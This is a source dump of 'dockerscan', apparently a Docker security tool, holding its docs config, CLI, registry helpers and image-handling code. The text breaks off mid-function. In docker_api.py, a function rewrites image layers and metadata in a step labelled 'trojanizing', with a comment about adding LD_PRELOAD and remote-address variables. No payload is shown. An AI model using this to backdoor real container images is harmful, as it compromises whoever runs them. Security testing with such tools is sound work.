116 | # A list of ignored prefixes for module index sorting.
117 | #modindex_common_prefix = []
118 |
119 | # If true, keep warnings as "system message" paragraphs in the built documents.
120 | #keep_warnings = False
121 |
122 | # If true, `todo` and `todoList` produce output, else they produce nothing.
123 | todo_include_todos = False
124 |
125 |
126 | # -- Options for HTML output ----------------------------------------------
127 |
128 | # The theme to use for HTML and HTML Help pages. See the documentation for
129 | # a list of builtin themes.
130 | html_theme = 'alabaster'
131 |
132 | # Theme options are theme-specific and customize the look and feel of a theme
133 | # further. For a list of options available for each theme, see the
134 | # documentation.
135 |
136 | html_theme_options = {
137 | 'logo': 'dockerscan-logo.png',
138 | 'description': 'A Docker analysis tools',
139 | 'github_user': 'cr0hn',
140 | 'github_repo': 'dockerscan',
141 | 'github_button': True,
142 | 'github_type': 'star',
143 | 'github_banner': True,
144 | 'travis_button': True,
145 | 'codecov_button': True,
146 | 'pre_bg': '#FFF6E5',
147 | 'note_bg': '#E5ECD1',
148 | 'note_border': '#BFCF8C',
149 | 'body_text': '#482C0A',
150 | 'sidebar_text': '#49443E',
151 | 'sidebar_header': '#4B4032',
152 | 'show_powered_by': False
153 | }
154 |
155 |
156 | # The name of an image file (within the static path) to use as favicon of the
157 | # docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
158 | # pixels large.
159 | html_favicon = "favicon.ico"
160 |
161 | # Add any paths that contain custom static files (such as style sheets) here,
162 | # relative to this directory. They are copied after the builtin static files,
163 | # so a file named "default.css" will overwrite the builtin "default.css".
164 | html_static_path = ['_static']
165 |
166 | # If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
167 | # using the given strftime format.
168 | #html_last_updated_fmt = '%b %d, %Y'
169 |
170 | # If true, SmartyPants will be used to convert quotes and dashes to
171 | # typographically correct entities.
172 | html_use_smartypants = True
173 |
174 | # Custom sidebar templates, maps document names to template names.
175 | html_sidebars = {
176 | '**': [
177 | 'about.html',
178 | 'navigation.html',
179 | 'searchbox.html',
180 | 'localtoc.html',
181 | 'relations.html',
182 | 'sourcelink.html',
183 | 'searchbox.html'
184 | ]
185 | }
186 |
187 | # If false, no module index is generated.
188 | #html_domain_indices = True
189 |
190 | # If false, no index is generated.
191 | #html_use_index = True
192 |
193 | # If true, the index is split into individual pages for each letter.
194 | #html_split_index = False
195 |
196 | # If true, links to the reST sources are added to the pages.
197 | #html_show_sourcelink = True
198 |
199 | # If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
200 | # html_show_sphinx = False
201 |
202 | # If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
203 | #html_show_copyright = True
204 |
205 | # If true, an OpenSearch description file will be output, and all pages will
206 | # contain a tag referring to it. The value of this option must be the
207 | # base URL from which the finished HTML is served.
208 | #html_use_opensearch = ''
209 |
210 | # Language to be used for generating the HTML full-text search index.
211 | # Sphinx supports the following languages:
212 | # 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
213 | # 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
214 | html_search_language = 'en'
215 |
216 | # A dictionary with options for the search language support, empty by default.
217 | # Now only 'ja' uses this config value
218 | #html_search_options = {'type': 'default'}
219 |
220 | # The name of a javascript file (relative to the configuration directory) that
221 | # implements a search results scorer. If empty, the default will be used.
222 | #html_search_scorer = 'scorer.js'
223 |
224 | # Output file base name for HTML help builder.
225 | htmlhelp_basename = 'dockerscan'
226 |
227 | # -- Options for LaTeX output ---------------------------------------------
228 |
229 | latex_elements = {
230 | # The paper size ('letterpaper' or 'a4paper').
231 | #'papersize': 'letterpaper',
232 |
233 | # The font size ('10pt', '11pt' or '12pt').
234 | #'pointsize': '10pt',
235 |
236 | # Additional stuff for the LaTeX preamble.
237 | #'preamble': '',
238 |
239 | # Latex figure (float) alignment
240 | #'figure_align': 'htbp',
241 | }
242 |
243 | # Grouping the document tree into LaTeX files. List of tuples
244 | # (source start file, target name, title,
245 | # author, documentclass [howto, manual, or own class]).
246 | latex_documents = [
247 | (master_doc, 'dockerscan.tex', u'API-Test Documentation',
248 | u'Daniel Garcia - cr0hn', 'manual'),
249 | ]
250 |
251 | # The name of an image file (relative to this directory) to place at the top of
252 | # the title page.
253 | #latex_logo = None
254 |
255 | # For "manual" documents, if this is true, then toplevel headings are parts,
256 | # not chapters.
257 | #latex_use_parts = False
258 |
259 | # If true, show page references after internal links.
260 | #latex_show_pagerefs = False
261 |
262 | # If true, show URL addresses after external links.
263 | #latex_show_urls = False
264 |
265 | # Documents to append as an appendix to all manuals.
266 | #latex_appendices = []
267 |
268 | # If false, no module index is generated.
269 | #latex_domain_indices = True
270 |
271 |
272 | # -- Options for manual page output ---------------------------------------
273 |
274 | # One entry per manual page. List of tuples
275 | # (source start file, name, description, authors, manual section).
276 | man_pages = [
277 | (master_doc, 'dockerscan', u'dockerscan Documentation',
278 | [author], 1)
279 | ]
280 |
281 | # If true, show URL addresses after external links.
282 | #man_show_urls = False
283 |
284 |
285 | # -- Options for Texinfo output -------------------------------------------
286 |
287 | # Grouping the document tree into Texinfo files. List of tuples
288 | # (source start file, target name, title, author,
289 | # dir menu entry, description, category)
290 | texinfo_documents = [
291 | (master_doc, 'dockerscan', u'dockerscan',
292 | author, 'Daniel Garcia (cr0hn) / Roberto Munoz', 'A Docker analysis tools',
293 | 'Miscellaneous'),
294 | ]
295 |
296 | # Documents to append as an appendix to all manuals.
297 | #texinfo_appendices = []
298 |
299 | # If false, no module index is generated.
300 | #texinfo_domain_indices = True
301 |
302 | # How to display URL addresses: 'footnote', 'no', or 'inline'.
303 | #texinfo_show_urls = 'footnote'
304 |
305 | # If true, do not generate a @detailmenu in the "Top" node's menu.
306 | #texinfo_no_detailmenu = False
307 |
308 |
309 | # -- Options for Epub output ----------------------------------------------
310 |
311 | # Bibliographic Dublin Core info.
312 | epub_title = project
313 | epub_author = author
314 | epub_publisher = author
315 | epub_copyright = copyright
316 |
317 | # The basename for the epub file. It defaults to the project name.
318 | #epub_basename = project
319 |
320 | # The HTML theme for the epub output. Since the default themes are not
321 | # optimized for small screen space, using the same theme for HTML and epub
322 | # output is usually not wise. This defaults to 'epub', a theme designed to save
323 | # visual space.
324 | #epub_theme = 'epub'
325 |
326 | # The language of the text. It defaults to the language option
327 | # or 'en' if the language is not set.
328 | #epub_language = ''
329 |
330 | # The scheme of the identifier. Typical schemes are ISBN or URL.
331 | #epub_scheme = ''
332 |
333 | # The unique identifier of the text. This can be a ISBN number
334 | # or the project homepage.
335 | #epub_identifier = ''
336 |
337 | # A unique identification for the text.
338 | #epub_uid = ''
339 |
340 | # A tuple containing the cover image and cover page html template filenames.
341 | #epub_cover = ()
342 |
343 | # A sequence of (type, uri, title) tuples for the guide element of content.opf.
344 | #epub_guide = ()
345 |
346 | # HTML files that should be inserted before the pages created by sphinx.
347 | # The format is a list of tuples containing the path and title.
348 | #epub_pre_files = []
349 |
350 | # HTML files shat should be inserted after the pages created by sphinx.
351 | # The format is a list of tuples containing the path and title.
352 | #epub_post_files = []
353 |
354 | # A list of files that should not be packed into the epub file.
355 | epub_exclude_files = ['search.html']
356 |
357 | # The depth of the table of contents in toc.ncx.
358 | #epub_tocdepth = 3
359 |
360 | # Allow duplicate toc entries.
361 | #epub_tocdup = True
362 |
363 | # Choose between 'default' and 'includehidden'.
364 | #epub_tocscope = 'default'
365 |
366 | # Fix unsupported image types using the Pillow.
367 | #epub_fix_images = False
368 |
369 | # Scale large images.
370 | #epub_max_image_width = 0
371 |
372 | # How to display URL addresses: 'footnote', 'no', or 'inline'.
373 | #epub_show_urls = 'inline'
374 |
375 | # If false, no index is generated.
376 | #epub_use_index = True
377 |
--------------------------------------------------------------------------------
/doc/source/favicon.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cr0hn/dockerscan/590a844418038d25e6649e609ef630868e0c9161/doc/source/favicon.ico
--------------------------------------------------------------------------------
/doc/source/index.rst:
--------------------------------------------------------------------------------
1 | Welcome to dockerscan's documentation!
2 | ======================================
3 |
4 | +----------------+--------------------------------------------------+
5 | |Project site | http://github.com/cr0hn/dockerscan |
6 | +----------------+--------------------------------------------------+
7 | |Author | Daniel Garcia (cr0hn) / Roberto Munoz (robskye) |
8 | +----------------+--------------------------------------------------+
9 | |Documentation | http://dockerscan.readthedocs.org |
10 | +----------------+--------------------------------------------------+
11 | |Last Version | 1.0.0a1 |
12 | +----------------+--------------------------------------------------+
13 | |Python versions | 3.5 or above |
14 | +----------------+--------------------------------------------------+
15 |
16 | A Docker analysis tools
17 |
18 | Contents
19 | ++++++++
20 |
21 | .. toctree::
22 | :maxdepth: 2
23 |
24 | quickstart
25 | install
26 | registries
27 | images
28 | scan
29 |
30 | Indices and tables
31 | ==================
32 |
33 | * :ref:`genindex`
34 | * :ref:`modindex`
35 | * :ref:`search`
36 |
37 |
--------------------------------------------------------------------------------
/doc/source/quickstart.rst:
--------------------------------------------------------------------------------
1 | Quick Start
2 | ===========
3 |
4 | Quick start doc of dockerscan.
--------------------------------------------------------------------------------
/dockerscan/__init__.py:
--------------------------------------------------------------------------------
1 | from .core import *
2 | from .actions import *
3 |
4 | __version__ = "1.0.0-a4"
5 |
--------------------------------------------------------------------------------
/dockerscan/__main__.py:
--------------------------------------------------------------------------------
1 | def main():
2 | import os
3 | import sys
4 |
5 | if sys.version_info < (3, 5,):
6 | print("To run dockerscan you Python 3.5+")
7 | sys.exit(0)
8 |
9 | parent_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
10 | sys.path.insert(1, parent_dir)
11 | import dockerscan
12 |
13 | __package__ = str("dockerscan")
14 |
15 | # Run the cmd
16 | from dockerscan.actions.cli import cli
17 |
18 | cli()
19 |
20 | if __name__ == "__main__": # pragma no cover
21 | main()
22 |
--------------------------------------------------------------------------------
/dockerscan/actions/__init__.py:
--------------------------------------------------------------------------------
1 | from .scan import *
2 | from .helpers import *
3 | from .registry import *
4 |
--------------------------------------------------------------------------------
/dockerscan/actions/cli.py:
--------------------------------------------------------------------------------
1 | import click
2 | import logging
3 |
4 | from dockerscan import global_options
5 |
6 | from .scan.cli import scan
7 | from .image.cli import image
8 | from .registry.cli import registry
9 |
10 | log = logging.getLogger('dockerscan')
11 |
12 |
13 | @global_options()
14 | @click.pass_context
15 | def cli(ctx, **kwargs):
16 | ctx.obj = kwargs
17 |
18 | cli.add_command(scan)
19 | cli.add_command(image)
20 | cli.add_command(registry)
21 |
22 |
23 | if __name__ == "__main__" and __package__ is None: # pragma no cover
24 | cli()
25 |
--------------------------------------------------------------------------------
/dockerscan/actions/helpers.py:
--------------------------------------------------------------------------------
1 | import ssl
2 | import socket
3 | import logging
4 |
5 | from typing import Union, Set
6 | from urllib.parse import urlparse
7 | from collections import defaultdict
8 |
9 | import requests
10 |
11 | from requests.exceptions import ConnectTimeout, ConnectionError
12 |
13 | from ..core.model import SharedConfig
14 | from ..core.exceptions import DockerscanTimeoutError
15 |
16 | requests.packages.urllib3.disable_warnings()
17 |
18 |
19 | def check_console_input_config(config: SharedConfig,
20 | log: logging.Logger = None) -> bool:
21 |
22 | log = log or logging.getLogger(__package__.split(".", maxsplit=1)[0])
23 |
24 | # Check if config is valid
25 | if not config.is_valid:
26 | for prop, msg in config.validation_errors:
27 |
28 | log.critical("[!] '%s' property %s" % (prop, msg))
29 | return False
30 |
31 | return True
32 |
33 |
34 | def sanitize_url(url: str, port: int = 5000, schema: str = "http") -> str:
35 | if ":" not in url:
36 | url = "{}:{}".format(url, port)
37 |
38 | if not url.startswith("http"):
39 | url = "http://{}".format(url)
40 |
41 | return url
42 |
43 |
44 | def get_ssl_common_names(remote: str) -> set:
45 | """This function extract the Common Names from a SSL certificate"""
46 |
47 | # Extract info from URL
48 | scheme, hostname, *_ = urlparse(remote)
49 |
50 | if ":" in hostname:
51 | hostname, port = hostname.split(":")
52 | port = int(port)
53 | elif "https" == scheme:
54 | hostname, port = hostname, 443
55 | else:
56 | return set()
57 |
58 | ret = set()
59 |
60 | ctx = ssl.create_default_context()
61 | s = ctx.wrap_socket(socket.socket(), server_hostname="*")
62 | try:
63 | s.connect((hostname, port))
64 | except ssl.CertificateError as e:
65 | key = "match either of "
66 | msg = str(e)
67 |
68 | # Extract domain from SSL CN
69 | msg = msg[msg.index(key) + len(key):]
70 |
71 | # Clear
72 | domains = msg.replace("'", "").replace(" ", "")
73 |
74 | # Unify domains
75 | for domain in domains.split(","):
76 | if domain.startswith("*"):
77 | domain = domain[2:]
78 |
79 | ret.add(domain)
80 | except ssl.SSLError:
81 | pass
82 |
83 | return ret
84 |
85 |
86 | def get_remote_registry_info(target: str) -> Union[Set,
87 | DockerscanTimeoutError]:
88 | """
89 | This function does two things:
90 |
91 | - detect the remote registry version. Allowed returned values are: {1, 2}
92 | - detect if remote Docker Registry has enabled the authentication
93 |
94 | :return: a tuple as format: (REMOTE_VERSION, ENABLED_OR_NOT_AUTH)
95 | :rtype: tuple(int, bool)
96 |
97 | :raise DockerscanTimeoutError: If remote server reach a timeout
98 | """
99 | #
100 | # Check for verion 2
101 | #
102 | remote_version = 1
103 | enabled_auth = False
104 |
105 | try:
106 | r = requests.get("{}/v2/".format(target),
107 | timeout=2,
108 | allow_redirects=False,
109 | verify=False)
110 |
111 | if r.status_code in (200, 401):
112 | if "registry/2.0" in r.headers["Docker-Distribution-Api-Version"]:
113 | remote_version = 2
114 |
115 | if r.status_code == 401:
116 | enabled_auth = True
117 |
118 | return remote_version, enabled_auth
119 |
120 | except (ConnectTimeout, ConnectionError) as e:
121 | raise DockerscanTimeoutError("Remote registry '{}' do not responds".
122 | format(target))
123 |
124 |
125 | def display_results_console(results: Union[dict, list], log, start_padding=0):
126 |
127 | # Check if results is and object / class or a basic type:
128 | if str(type(results))[8:].strip().startswith("dockerscan"):
129 | results = {x: y for x, y in results.__dict__.items()
130 | if not x.startswith("_") and y and type(y) is not bool}
131 |
132 | prefix_symbols = ["-", ">", "+", "_", "\\"]
133 |
134 | padding = "{}{} ".format(" " * (0 if start_padding == 0
135 | else start_padding * 2),
136 | prefix_symbols[start_padding],)
137 | new_padding = start_padding + 1
138 |
139 | if isinstance(results, dict):
140 | for prop, value in results.items():
141 | # Do not put: "not value" because it will ignore entries
142 | # with value "False", and we want theres values
143 | pretty_prop = prop.capitalize().replace("_", " ")
144 |
145 | # List will be displayed different
146 | if type(value) not in (bytes, str, int, float, bool):
147 | log.console("{}{}:".format(padding,
148 | pretty_prop))
149 |
150 | display_results_console(value,
151 | log,
152 | new_padding)
153 | # Plain properties
154 | else:
155 | log.console("{}{} = {}".format(padding,
156 | pretty_prop,
157 | value))
158 |
159 | elif isinstance(results, (list, set, tuple)):
160 | for p in results:
161 | if isinstance(p, (str, bytes)):
162 | log.console("{}{}".format(padding,
163 | p))
164 | else:
165 | # log.console("{} - {}:".format(p,
166 | # padding))
167 | display_results_console(p, log, new_padding)
168 |
169 |
170 | __all__ = ("check_console_input_config", "get_remote_registry_info",
171 | "sanitize_url", "display_results_console")
172 |
--------------------------------------------------------------------------------
/dockerscan/actions/image/__init__.py:
--------------------------------------------------------------------------------
1 | from .api import *
2 | from .model import *
3 | from .docker_api import *
4 |
--------------------------------------------------------------------------------
/dockerscan/actions/image/api.py:
--------------------------------------------------------------------------------
1 | import tempfile
2 |
3 | from ...core import DockerscanError
4 |
5 | from .model import *
6 | from .docker_api import *
7 | from .image_analyzer import *
8 |
9 |
10 | def run_image_info_dockerscan(config: DockerImageInfoModel) -> DockerImageInfo:
11 | assert isinstance(config, DockerImageInfoModel)
12 |
13 | # Get docker info
14 | docker_info = DockerImageInfo()
15 | for layer in get_docker_image_layers(config.image_path):
16 | docker_info.add_layer_info(layer)
17 |
18 | return docker_info
19 |
20 |
21 | def run_image_extract_dockerscan(config: DockerImageExtractModel):
22 | assert isinstance(config, DockerImageExtractModel)
23 |
24 | extract_docker_image(config.image_path,
25 | config.extract_path)
26 |
27 |
28 | def run_image_analyze_dockerscan(config: DockerImageAnalyzeModel):
29 | assert isinstance(config, DockerImageAnalyzeModel)
30 |
31 | with tempfile.TemporaryDirectory() as tmp_dir:
32 |
33 | # Get docker info
34 | docker_info = DockerImageInfo()
35 |
36 | try:
37 | for layer in get_docker_image_layers(config.image_path):
38 | docker_info.add_layer_info(layer)
39 | except KeyError as e:
40 | raise DockerscanError(e)
41 |
42 | # Extract docker data
43 | extract_docker_image(config.image_path,
44 | tmp_dir)
45 |
46 | # Run the analysis
47 | analysis_results = analyze_docker_image(tmp_dir, docker_info)
48 |
49 | return analysis_results
50 |
51 |
52 | __all__ = ("run_image_info_dockerscan",
53 | "run_image_extract_dockerscan",
54 | "run_image_analyze_dockerscan",)
55 |
--------------------------------------------------------------------------------
/dockerscan/actions/image/cli.py:
--------------------------------------------------------------------------------
1 | import click
2 |
3 |
4 | from .model import *
5 | from .console import *
6 | from .modifiers.cli import *
7 | from ..helpers import check_console_input_config
8 |
9 |
10 | @click.group(help="Docker images commands")
11 | @click.pass_context
12 | def image(ctx, **kwargs):
13 | pass
14 |
15 |
16 | @image.command(help="get docker image information")
17 | @click.pass_context
18 | @click.argument("image_path")
19 | def info(ctx, **kwargs):
20 | config = DockerImageInfoModel(**ctx.obj, **kwargs)
21 |
22 | # Check if valid
23 | if check_console_input_config(config):
24 | launch_dockerscan_image_info_in_console(config)
25 |
26 |
27 | @image.command(help="extract docker image content")
28 | @click.pass_context
29 | @click.argument("image_path")
30 | @click.argument("extract_path")
31 | def extract(ctx, **kwargs):
32 | config = DockerImageExtractModel(**ctx.obj, **kwargs)
33 |
34 | # Check if valid
35 | if check_console_input_config(config):
36 | launch_dockerscan_image_extract_in_console(config)
37 |
38 |
39 | @image.command(help="looking for sensitive data from docker image")
40 | @click.pass_context
41 | @click.argument("image_path")
42 | def analyze(ctx, **kwargs):
43 | config = DockerImageAnalyzeModel(**ctx.obj, **kwargs)
44 |
45 | # Check if valid
46 | if check_console_input_config(config):
47 | launch_dockerscan_image_analyze_in_console(config)
48 |
49 | image.add_command(modify)
50 |
--------------------------------------------------------------------------------
/dockerscan/actions/image/console.py:
--------------------------------------------------------------------------------
1 | import os
2 | import logging
3 |
4 | from dockerscan import get_log_level, run_in_console
5 |
6 | from .api import *
7 | from .model import *
8 | from ..helpers import display_results_console
9 |
10 | log = logging.getLogger('dockerscan')
11 |
12 |
13 | def launch_dockerscan_image_info_in_console(config: DockerImageInfoModel):
14 | """Launch in console mode"""
15 |
16 | log.setLevel(get_log_level(config.verbosity))
17 |
18 | with run_in_console(config.debug):
19 |
20 | log.console("Starting analyzing docker image...")
21 | log.console("Selected image: '{}'".format(
22 | os.path.basename(config.image_path)))
23 |
24 | results = run_image_info_dockerscan(config)
25 |
26 | # Display image summary
27 | log.console("Analysis finished. Results:")
28 | display_results_console(results, log)
29 |
30 |
31 | def launch_dockerscan_image_extract_in_console(config: DockerImageInfoModel):
32 | """Launch in console mode"""
33 |
34 | log.setLevel(get_log_level(config.verbosity))
35 |
36 | with run_in_console(config.debug):
37 |
38 | log.console("Starting the extraction of docker image...")
39 | log.console("Selected image: '{}'".format(
40 | os.path.basename(config.image_path)))
41 |
42 | run_image_extract_dockerscan(config)
43 |
44 | # Display image summary
45 | log.console("Image content extracted")
46 |
47 |
48 | def launch_dockerscan_image_analyze_in_console(config: DockerImageAnalyzeModel):
49 | """Launch in console mode"""
50 |
51 | log.setLevel(get_log_level(config.verbosity))
52 |
53 | with run_in_console(config.debug):
54 |
55 | log.console("Starting the analysis of docker image...")
56 | log.console("Selected image: '{}'".format(
57 | os.path.basename(config.image_path)))
58 |
59 | results = run_image_analyze_dockerscan(config)
60 |
61 | # Display image summary
62 | log.console("Analysis finished. Results:")
63 | display_results_console(results, log)
64 |
65 |
66 | __all__ = ("launch_dockerscan_image_info_in_console",
67 | "launch_dockerscan_image_extract_in_console",
68 | "launch_dockerscan_image_analyze_in_console")
69 |
--------------------------------------------------------------------------------
/dockerscan/actions/image/docker_api.py:
--------------------------------------------------------------------------------
1 | """
2 | This file is was taken idea from 'undocker' project. Thank for your work and
3 | for shared the code. It was very useful to write this lib.
4 |
5 | Undocker project:
6 |
7 | https://github.com/larsks/undocker
8 | """
9 |
10 | import os
11 | import io
12 | import re
13 | import errno
14 | import shutil
15 | import os.path
16 | import tarfile
17 | import logging
18 | import hashlib
19 | import tempfile
20 |
21 | try:
22 | import ujson as json
23 | except ImportError:
24 | import json
25 |
26 | from typing import Dict, Tuple, List, Union
27 | from contextlib import closing, contextmanager
28 | from dockerscan import DockerscanNotExitsError, DockerscanError
29 |
30 | log = logging.getLogger("dockerscan")
31 |
32 |
33 | # --------------------------------------------------------------------------
34 | # Aux functions
35 | # --------------------------------------------------------------------------
36 | def _find_metadata_in_layers(img, id) -> dict:
37 | with closing(img.extractfile('%s/json' % id)) as fd:
38 | f_content = fd.read()
39 | if hasattr(f_content, "decode"):
40 | f_content = f_content.decode()
41 | yield json.loads(f_content)
42 |
43 |
44 | def _find_layers(img, id):
45 | with closing(img.extractfile('%s/json' % id)) as fd:
46 | f_content = fd.read()
47 | if hasattr(f_content, "decode"):
48 | f_content = f_content.decode()
49 | info = json.loads(f_content)
50 |
51 | log.debug('layer = %s', id)
52 | for k in ['os', 'architecture', 'author', 'created']:
53 | if k in info:
54 | log.debug('%s = %s', k, info[k])
55 |
56 | yield id
57 |
58 | if 'parent' in info:
59 | pid = info['parent']
60 | for layer in _find_layers(img, pid):
61 | yield layer
62 |
63 |
64 | # --------------------------------------------------------------------------
65 | # Public API
66 | # --------------------------------------------------------------------------
67 | @contextmanager
68 | def open_docker_image(image_path: str):
69 | """
70 | This function is a context manager that allow to open a docker image and
71 | return their layers and the layers metadata.
72 |
73 | yields img:TarFile, first_layer, image_and_tag, manifest
74 |
75 | >>> with open_docker_image("~/images/nginx:latest") as (img, first_layer, image_and_tag, manifest):
76 | print(img)
77 | print(first_layer)
78 | print(image_and_tag)
79 | print(manifest)
80 |
81 | '2dc9f5ef4d45394b3bfedbe23950de81cabd941519f59e163d243a7d4f859622'
82 | {'nginx': 'latest'}
83 | [{'Layers': ['8327c7df0d8cfe8652fc4be305e15e516b1b5bb48e13bb39780a87a58316c522/layer.tar', '076538d7e850181c3cccbdbce3a0811698efad376e2c99a72a203493739c2bf2/layer.tar', '2dc9f5ef4d45394b3bfedbe23950de81cabd941519f59e163d243a7d4f859622/layer.tar'], 'RepoTags': ['nginx:latest'], 'Config': 'db079554b4d2f7c65c4df3adae88cb72d051c8c3b8613eb44e86f60c945b1ca7.json'}]
84 |
85 | """
86 | tmp_image = os.path.basename(image_path)
87 |
88 | if ":" in tmp_image:
89 | image, tag, *_ = tmp_image.split(":", maxsplit=1)
90 | else:
91 | image, tag = tmp_image, "latest"
92 |
93 | #: Docker image layers and tags
94 | image_layers_tags = {}
95 |
96 | with tarfile.open(image_path, "r") as img:
97 |
98 | # read the manifest
99 | manifest_content = read_file_from_image(img, "manifest.json")
100 | if hasattr(manifest_content, "decode"):
101 | manifest_content = manifest_content.decode()
102 | manifest_content = json.loads(manifest_content)
103 |
104 | # Read the repo info
105 | repo_content = read_file_from_image(img, "repositories")
106 | if hasattr(repo_content, "decode"):
107 | repo_content = repo_content.decode()
108 |
109 | repos_info = json.loads(repo_content)
110 |
111 | for name, tags in repos_info.items():
112 | image_layers_tags[name] = " ".join(tags)
113 |
114 | try:
115 | top_layers = repos_info[image][tag]
116 | except KeyError:
117 | image = list(image_layers_tags.keys())[0]
118 | tag = list(repos_info[image].keys())[0]
119 |
120 | top_layers = repos_info[image][tag]
121 |
122 | yield img, top_layers, image_layers_tags, manifest_content
123 |
124 |
125 | @contextmanager
126 | def extract_layer_in_tmp_dir(img: tarfile.TarFile,
127 | layer_digest: str) -> str:
128 | """
129 | This context manager allow to extract a selected layer into a temporal
130 | directory and yield the directory path
131 |
132 | >>> with open_docker_image(image_path) as (img,
133 | top_layer,
134 | _,
135 | manifest):
136 | last_layer_digest = get_last_image_layer(manifest)
137 | with extract_layer_in_tmp_dir(img, last_layer_digest) as d:
138 | print(d)
139 | """
140 | with tempfile.TemporaryDirectory() as d:
141 | log.debug(" > Extracting layer content in temporal "
142 | "dir: {}".format(d))
143 |
144 | extract_docker_layer(img, layer_digest, d)
145 |
146 | yield d
147 |
148 |
149 | def get_last_image_layer(manifest: Dict) -> str:
150 | log.debug(" > Getting de last layer in the docker image")
151 |
152 | # Layers are ordered in inverse order
153 | return get_layers_ids_from_manifest(manifest)[-1]
154 |
155 |
156 | @contextmanager
157 | def modify_docker_image_metadata(image_path: str,
158 | output_docker_image: str):
159 | """
160 | This context manager allow to modify the image metadata
161 |
162 | This context manager expect a DockerscanReturnContextManager() exception to
163 | get the wanted information from context excution.
164 |
165 | This exception raise must have 2 parameters:
166 | - Last layer JSON metadata content
167 | - roote layer JSON metadata content
168 |
169 | >>> with modify_docker_image_metadata(image_path,
170 | output_docker_image) as (last_layer_json,
171 | root_layer_json):
172 |
173 | new_json_data_last_layer = update_layer_user(last_layer_json,
174 | config.new_user)
175 | new_json_info_root_layer = update_layer_user(root_layer_json,
176 | config.new_user)
177 |
178 | raise DockerscanReturnContextManager(new_json_data_last_layer,
179 | new_json_info_root_layer)
180 | """
181 |
182 | # 1 - Get layers info
183 | log.debug(" > Opening docker file")
184 | with open_docker_image(image_path) as (
185 | img, top_layer, _, manifest):
186 |
187 | # 2 - Get the last layer in manifest
188 | old_layer_digest = get_last_image_layer(manifest)
189 | log.debug(" > Last layer: {}".format(old_layer_digest))
190 |
191 | with extract_layer_in_tmp_dir(img, old_layer_digest) as d:
192 |
193 | # Start trojanizing
194 | log.info(" > Starting trojaning process")
195 |
196 | new_layer_path, new_layer_digest = \
197 | build_image_layer_from_dir("new_layer.tar", d)
198 |
199 | # 5 - Updating the manifest
200 | new_manifest = build_manifest_with_new_layer(manifest,
201 | old_layer_digest,
202 | new_layer_digest)
203 |
204 | # Add new enviroment vars with LD_PRELOAD AND REMOTE ADDR
205 | json_info_last_layer = read_file_from_image(img,
206 | "{}/json".format(
207 | old_layer_digest))
208 |
209 | json_info_last_layer = json.loads(json_info_last_layer.decode())
210 |
211 | _, json_info_root_layer = get_root_json_from_image(img)
212 |
213 | new_json_data_last_layer, new_json_info_root_layer = None, None
214 |
215 | try:
216 | yield json_info_last_layer, json_info_root_layer
217 | except Exception as e:
218 | if e.__class__.__name__ == "DockerscanReturnContextManager":
219 | new_json_data_last_layer, new_json_info_root_layer = e.args
220 |
221 | if new_json_data_last_layer is None:
222 | return
223 |
224 | # 6 - Create new docker image
225 | log.info(" > Creating new docker image")
226 | create_new_docker_image(new_manifest,
227 | output_docker_image,
228 | img,
229 | old_layer_digest,
230 | new_layer_path,
231 | new_layer_digest,
232 | new_json_data_last_layer,
233 | new_json_info_root_layer)
234 |
235 |
236 | def build_image_layer_from_dir(layer_name: str,
237 | source_dir: str) -> Tuple[str, str]:
238 | """
239 | Create a new .tar docker layer from a directory content and return
240 | the new layer location and their digest
241 |
242 | >>> build_image_layer_from_dir("new_layer", "/tmp/new_layer/")
243 | "/tmp/new_layer/new_layer.tar", "076538d7e850181c3cccbdbce3a0811698efad376e2c99a72a203493739c2bf2"
244 | """
245 | if "tar" not in layer_name:
246 | layer_name = "{}.tar".format(layer_name)
247 |
248 | # Build new layer
249 | log.info(" > Building new {} layer image".format(layer_name))
250 |
251 | new_layer_path = os.path.join(source_dir, layer_name)
252 | with tarfile.open(new_layer_path, "w") as nl:
253 | nl.add(source_dir, arcname="/")
254 |
255 | # Calculating the digest
256 | log.info(" > Calculating new SHA256 hash for the new layer")
257 |
258 | with open(new_layer_path, "rb") as f:
259 | m = hashlib.sha256()
260 | m.update(f.read())
261 | new_layer_sha256 = m.hexdigest()
262 |
263 | return new_layer_path, new_layer_sha256
264 |
265 |
266 | def build_manifest_with_new_layer(old_manifest: dict,
267 | old_layer_digest: str,
268 | new_layer_digest: str) -> dict:
269 | """
270 | Build a new manifest with the information of new layer and return the new
271 | manifest object
272 |
273 | :return: JSON with the new manifest
274 | """
275 | log.info(" > Updating the manifest")
276 |
277 | new_manifest = old_manifest.copy()
278 |
279 | for i, layer_id in enumerate(old_manifest[0]["Layers"]):
280 | if old_layer_digest in layer_id:
281 | new_manifest[0]["Layers"][i] = "{}/layer.tar" \
282 | "".format(new_layer_digest)
283 | break
284 |
285 | return new_manifest
286 |
287 |
288 | def read_file_from_image(img: tarfile.TarFile,
289 | file_path: str,
290 | autoclose=False) -> bytes:
291 | if autoclose:
292 | with closing(img.extractfile(file_path)) as fd:
293 | return fd.read()
294 | else:
295 | return img.extractfile(file_path).read()
296 |
297 |
298 | def replace_or_append_file_to_layer(file_to_replace: str,
299 | content_or_path: bytes,
300 | img: tarfile.TarFile):
301 | # Is content or path?
302 | if not os.path.exists(content_or_path):
303 |
304 | # Is a content
305 | t = tarfile.TarInfo(file_to_replace)
306 | t.size = len(content_or_path)
307 | img.addfile(t, io.BytesIO(content_or_path))
308 |
309 | else:
310 | # Is a path
311 | img.add(content_or_path, file_to_replace)
312 |
313 |
314 | def add_new_file_to_image(file_to_append: str,
315 | path_in_image: str,
316 | image_path: str):
317 | file_to_append = os.path.abspath(file_to_append)
318 |
319 | with tempfile.NamedTemporaryFile() as tmp_out_image:
320 |
321 | with open_docker_image(image_path) as (
322 | img, top_layer, _, manifest):
323 |
324 | # 1 - Get the last layer in manifest
325 | old_layer_digest = get_last_image_layer(manifest)
326 |
327 | with extract_layer_in_tmp_dir(img, old_layer_digest) as d:
328 |
329 | # 2 - Copying new info
330 | copy_file_to_image_folder(d,
331 | file_to_append,
332 | path_in_image)
333 |
334 | new_layer_path, new_layer_digest = \
335 | build_image_layer_from_dir("new_layer.tar", d)
336 |
337 | # 3 - Updating the manifest
